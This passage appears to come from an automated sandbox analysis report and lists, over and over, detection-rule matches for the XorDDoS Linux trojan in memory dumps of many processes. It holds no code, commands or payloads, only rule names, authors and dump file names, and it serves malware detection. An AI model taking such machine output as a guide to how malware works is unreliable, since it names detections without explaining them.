Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6239.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6239.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6239.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6239.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6239.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6239.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6344.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6344.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6344.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6344.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6344.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6344.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6294.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6294.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6294.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6294.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6294.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6294.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6270.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6270.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6270.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6270.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6270.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6270.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6275.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6275.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6275.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6275.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6275.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6275.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6313.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6313.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6313.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6313.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6313.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6313.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6278.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6278.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6278.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6278.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6278.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6278.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6379.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6379.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6379.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6379.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6379.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6379.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6525.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6525.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6525.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6525.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6525.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6525.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6347.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6347.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6347.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6347.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6347.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6347.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6361.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6361.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6361.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6361.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6361.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6361.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
